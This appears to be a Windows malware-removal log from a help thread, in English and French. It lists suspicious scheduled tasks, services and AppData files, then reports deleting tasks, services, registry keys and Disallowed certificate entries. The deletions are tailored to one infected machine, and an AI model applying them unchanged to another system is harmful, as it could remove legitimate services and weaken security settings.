2018-05-24 02:27 - 2018-05-24 02:27 - 000003354 _____ C:\WINDOWS\System32\Tasks\psv_GeoSailfax
2018-05-24 02:27 - 2018-05-24 02:27 - 000003346 _____ C:\WINDOWS\System32\Tasks\psv_Scot-Lam
2018-05-24 02:27 - 2018-05-24 02:27 - 000003334 _____ C:\WINDOWS\System32\Tasks\psv_JobGocof
2018-05-24 02:27 - 2018-05-24 02:27 - 000000000 ____D C:\ProgramData\Voyasollams
2018-05-24 02:26 - 2018-05-24 02:26 - 000278510 _____ C:\Users\2s\AppData\Local\Grave-Com.bin
2018-05-24 02:26 - 2018-05-24 02:24 - 002136576 _____ (TODO: <Company name>) C:\Users\2s\AppData\Local\Tampzap.exe
2018-05-24 02:25 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Local\XService
2018-05-24 02:25 - 2018-05-24 02:25 - 003451904 ____H C:\WINDOWS\windefender.exe
2018-05-24 02:23 - 2018-06-02 20:59 - 000000000 ____D C:\Users\2s\AppData\Roaming\b1r11f5cjuf
2018-05-24 02:10 - 2018-05-24 17:17 - 000000000 ____D C:\Users\2s\AppData\LocalLow\iAiaDuTGfHtGg
2018-05-24 01:51 - 2018-05-24 01:51 - 000003334 _____ C:\WINDOWS\System32\Tasks\psv_ZumApron
2018-05-24 01:51 - 2018-05-24 01:51 - 000003330 _____ C:\WINDOWS\System32\Tasks\psv_TresDancof
2018-05-24 01:50 - 2018-05-24 01:50 - 000000000 ____D C:\Users\2s\AppData\Roaming\jw4ivehcxcm
2018-05-24 01:49 - 2018-06-02 16:38 - 000000000 ____D C:\Users\2s\AppData\Roaming\EpicNet Inc
2018-05-24 01:47 - 2018-06-02 18:22 - 000000000 ____D C:\Program Files (x86)\trs
2018-05-24 01:47 - 2018-05-24 01:47 - 000003334 _____ C:\WINDOWS\System32\Tasks\psv_FreshRemtax
2018-05-24 01:47 - 2018-05-24 01:47 - 000003326 _____ C:\WINDOWS\System32\Tasks\psv_Solo-Stock
2018-05-24 01:47 - 2018-05-24 01:47 - 000003322 _____ C:\WINDOWS\System32\Tasks\psv_ZoomEco
2018-05-24 01:46 - 2018-06-02 16:38 - 000000000 ____D C:\Users\2s\AppData\Roaming\WidModule
2018-05-24 01:46 - 2018-05-24 02:27 - 000126464 _____ C:\Users\2s\AppData\Local\noah.dat
2018-05-24 01:46 - 2018-05-24 02:27 - 000070896 _____ C:\Users\2s\AppData\Local\Config.xml
2018-05-24 01:46 - 2018-05-24 02:27 - 000018432 _____ C:\Users\2s\AppData\Local\Main.dat
2018-05-24 01:46 - 2018-05-24 02:27 - 000005568 _____ C:\Users\2s\AppData\Local\md.xml
2018-05-24 01:46 - 2018-05-24 01:46 - 001987661 _____ C:\Users\2s\AppData\Local\Dongtom.tst
2018-05-24 01:45 - 2018-05-24 22:05 - 000003650 _____ C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask
2018-05-24 01:45 - 2018-05-24 01:45 - 000000000 ____D C:\Program Files\My Program
2018-05-24 01:44 - 2018-05-24 01:44 - 000000000 ____D C:\ProgramData\yahoochrome_D
2018-05-24 01:43 - 2018-05-24 01:43 - 000278508 _____ C:\Users\2s\AppData\Local\K-is.bin
2018-05-24 01:43 - 2018-05-24 01:41 - 002136576 _____ (TODO: <Company name>) C:\Users\2s\AppData\Local\Dongtom.exe
2018-05-24 01:42 - 2018-06-02 21:02 - 000003588 _____ C:\WINDOWS\System32\Tasks\ScheduledUpdate
2018-05-24 01:42 - 2018-06-02 21:02 - 000003258 _____ C:\WINDOWS\System32\Tasks\csrss
2018-05-24 01:42 - 2018-06-02 16:40 - 000000000 ___HD C:\WINDOWS\rss
2018-05-24 01:41 - 2018-05-24 21:42 - 000929792 _____ C:\Users\2s\AppData\Local\sham.db
2018-05-24 01:41 - 2018-05-24 01:52 - 000000414 _____ C:\WINDOWS\Tasks\Updater_Online_Application.job
2018-05-24 01:41 - 2018-05-24 01:52 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G6.job
2018-05-24 01:41 - 2018-05-24 01:52 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G5.job
2018-05-24 01:41 - 2018-05-24 01:52 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G4.job
2018-05-24 01:41 - 2018-05-24 01:52 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G3.job
2018-05-24 01:41 - 2018-05-24 01:52 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G2.job
2018-05-24 01:41 - 2018-05-24 01:52 - 000000382 _____ C:\WINDOWS\Tasks\Online Application V2G1.job
2018-05-24 01:41 - 2018-05-24 01:41 - 000003308 _____ C:\WINDOWS\System32\Tasks\Updater_Online_Application
2018-05-24 01:41 - 2018-05-24 01:41 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G6
2018-05-24 01:41 - 2018-05-24 01:41 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G5
2018-05-24 01:41 - 2018-05-24 01:41 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G4
2018-05-24 01:41 - 2018-05-24 01:41 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G3
2018-05-24 01:41 - 2018-05-24 01:41 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G2
2018-05-24 01:41 - 2018-05-24 01:41 - 000003272 _____ C:\WINDOWS\System32\Tasks\Online Application V2G1
2018-05-24 01:39 - 2018-05-24 01:42 - 000000000 ____D C:\Program Files (x86)\foldershare
2018-05-24 01:38 - 2018-05-24 01:38 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-24 00:23 - 2018-05-24 00:23 - 000000000 ____D C:\Program Files\AutoCAD 2010
2018-05-24 00:15 - 2018-06-02 16:48 - 000004170 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{3392FECE-DEB2-4177-8D46-BABD458AA14F}
2018-05-24 00:07 - 2018-05-24 00:08 - 000000000 ____D C:\ProgramData\FLEXnet
EmptyTemp:
RemoveProxy:
Reboot:

Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0E8B2C56-528C-4945-BB6B-F1F0489A2658}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0E8B2C56-528C-4945-BB6B-F1F0489A2658}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Online Application V2G4 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G4" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{124B9B29-B301-4BB9-8FEF-5B9DA72F02FE}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{124B9B29-B301-4BB9-8FEF-5B9DA72F02FE}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\RuvZlWnxKNkmGuM2 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RuvZlWnxKNkmGuM2" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{14C243B6-F63D-4EBB-B922-F9E7A98E93F8}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{14C243B6-F63D-4EBB-B922-F9E7A98E93F8}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\psv_Sailcore => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_Sailcore" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{184DFF65-5562-436A-BBC1-6D1B3A704D95}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{184DFF65-5562-436A-BBC1-6D1B3A704D95}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\psv_GeoSailfax => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_GeoSailfax" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{217F1DD6-FB2C-40C0-AA0A-AB4B1B094ECD} => non trouvé(e)
"C:\WINDOWS\System32\Tasks\KnPQHVchzdGfrlHaz2" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\KnPQHVchzdGfrlHaz2 => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{23DC4AC2-D7E0-464B-A54C-D01A748D95A2}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{23DC4AC2-D7E0-464B-A54C-D01A748D95A2}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Online Application V2G1 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G1" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{298639F9-958A-412D-93BC-0DFBCF1F5E68}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{298639F9-958A-412D-93BC-0DFBCF1F5E68}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\wAJDAAZgOBCdyQgsK2 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\wAJDAAZgOBCdyQgsK2" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{2BB4F419-83CC-4C8E-9B17-30DD03213B44}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2BB4F419-83CC-4C8E-9B17-30DD03213B44}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\IP Relub => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IP Relub" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2E39416B-8542-4870-A25C-08BE631A36DF}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2E39416B-8542-4870-A25C-08BE631A36DF}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Windows Defender\Windows Defender Verification" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3481D7F0-4DEC-43BC-B2DC-0AC8C7F143AC}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3481D7F0-4DEC-43BC-B2DC-0AC8C7F143AC}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\psv_ZoomEco => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_ZoomEco" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4244D09C-E4EC-4F2D-9B86-08B899721340}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4244D09C-E4EC-4F2D-9B86-08B899721340}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Online Application V2G3 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G3" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4C32DD45-9B88-43FB-A121-E846A3C36741}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4C32DD45-9B88-43FB-A121-E846A3C36741}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\psv_Solo-Stock => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_Solo-Stock" => supprimé(es) avec succès
TCPSvc => Service arrêté avec succès.
"HKLM\System\CurrentControlSet\Services\TCPSvc" => supprimé(es) avec succès
TCPSvc => service supprimé(es) avec succès
"HKLM\System\CurrentControlSet\Services\Voyasollam" => supprimé(es) avec succès
Voyasollam => service supprimé(es) avec succès
"HKLM\System\CurrentControlSet\Services\ZAMSvc" => supprimé(es) avec succès
ZAMSvc => service supprimé(es) avec succès
"HKLM\System\CurrentControlSet\Services\saiyitechnology" => supprimé(es) avec succès
saiyitechnology => service supprimé(es) avec succès
"HKLM\System\CurrentControlSet\Services\PDF24" => supprimé(es) avec succès
PDF24 => service supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4D47D321-6F4D-45E5-BB4E-AF32EC95D150}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4D47D321-6F4D-45E5-BB4E-AF32EC95D150}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Online Application V2G5 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G5" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4FBA52DD-AF42-4843-9B70-E96CDC034E78}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4FBA52DD-AF42-4843-9B70-E96CDC034E78}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Office\OfficeTelemetryAgentFallBack" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{54DC5A95-C460-4DDF-A623-A90AA916334D} => non trouvé(e)
"C:\WINDOWS\System32\Tasks\rArHIXNWKfbeRtR2" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\rArHIXNWKfbeRtR2 => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5D643E51-495D-4418-88F1-86DAA772BCB1}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5D643E51-495D-4418-88F1-86DAA772BCB1}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\csrss => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5FD2DA35-7BDC-41A4-9B6F-5DB4554BDEAA}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5FD2DA35-7BDC-41A4-9B6F-5DB4554BDEAA}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Setup\EOSNotify => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\EOSNotify" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{60A721D3-0B62-470B-B840-FFF528DB135C}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{60A721D3-0B62-470B-B840-FFF528DB135C}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\jbDyCmJOWCzWzi => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\jbDyCmJOWCzWzi" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{61784FEE-4B60-4356-AA82-A1984791B93D} => non trouvé(e)
"C:\WINDOWS\System32\Tasks\TdqeVjasHzsikvrWtEm2" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TdqeVjasHzsikvrWtEm2 => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A352E386-05D2-4ADC-A152-309444E9479D}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A352E386-05D2-4ADC-A152-309444E9479D}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\psv_JobGocof => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_JobGocof" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BAFE10EA-7284-4529-B67C-67005EC6394F}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BAFE10EA-7284-4529-B67C-67005EC6394F}" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FastDataX Task => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BEA2DD67-BB47-489A-8D48-1DE709CBF7F5}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BEA2DD67-BB47-489A-8D48-1DE709CBF7F5}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\psv_TresDancof => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_TresDancof" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C45E16FE-8ED9-4B3F-99C9-CA2B42FAC904}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C45E16FE-8ED9-4B3F-99C9-CA2B42FAC904}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\psv_FreshRemtax => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_FreshRemtax" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C5A4DD32-4C84-485A-A6CC-92991A4EFD8E}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C5A4DD32-4C84-485A-A6CC-92991A4EFD8E}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\TUZwhpCbnzWcBoUhWSI2 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TUZwhpCbnzWcBoUhWSI2" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C628122E-598C-4A56-94E8-301E43055366}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C628122E-598C-4A56-94E8-301E43055366}" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ReimageUpdater => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6A04AF6-6652-4F3E-B043-B0FCAC0F17EE}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6A04AF6-6652-4F3E-B043-B0FCAC0F17EE}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\psv_FixSing => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_FixSing" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C7E9B9E5-7022-4F87-BB31-D933E65232DD}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C7E9B9E5-7022-4F87-BB31-D933E65232DD}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\ScheduledUpdate => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DD27E196-CB64-4839-AE0B-1C77E6B0DF51} => non trouvé(e)
"C:\WINDOWS\System32\Tasks\XLqsfoKFUKuTqG" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\XLqsfoKFUKuTqG => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DF3C198D-B30D-45AD-8584-AAFB8B881A21}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DF3C198D-B30D-45AD-8584-AAFB8B881A21}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Online Application V2G2 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G2" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DFEC916E-0BE3-4D71-B4F3-D698BBBD67BA}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DFEC916E-0BE3-4D71-B4F3-D698BBBD67BA}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Online Application V2G6 => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application V2G6" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E9FFBC4A-6E3B-4009-9536-2CFDCED7DDDF}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E9FFBC4A-6E3B-4009-9536-2CFDCED7DDDF}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\psv_ZumApron => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_ZumApron" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EBBD806D-C2EE-4C13-872B-84B138CA783D}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EBBD806D-C2EE-4C13-872B-84B138CA783D}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Updater_Online_Application => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Updater_Online_Application" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EC92AAEA-6472-49BB-8C13-A08C4A03BA48}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EC92AAEA-6472-49BB-8C13-A08C4A03BA48}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\psv_Scot-Lam => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\psv_Scot-Lam" => supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F53ED0B5-E862-432F-A8D7-5A473438B4AD} => non trouvé(e)
"C:\WINDOWS\System32\Tasks\WobUIKhuMtTTi2" => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WobUIKhuMtTTi2 => non trouvé(e)
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{F9A5FEF7-2409-4967-B010-E3827FE969B1}" => supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F9A5FEF7-2409-4967-B010-E3827FE969B1}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\ImpoperViewer => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ImpoperViewer" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29" => supprimé(es) avec succès
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF" => supprimé(es) avec succès
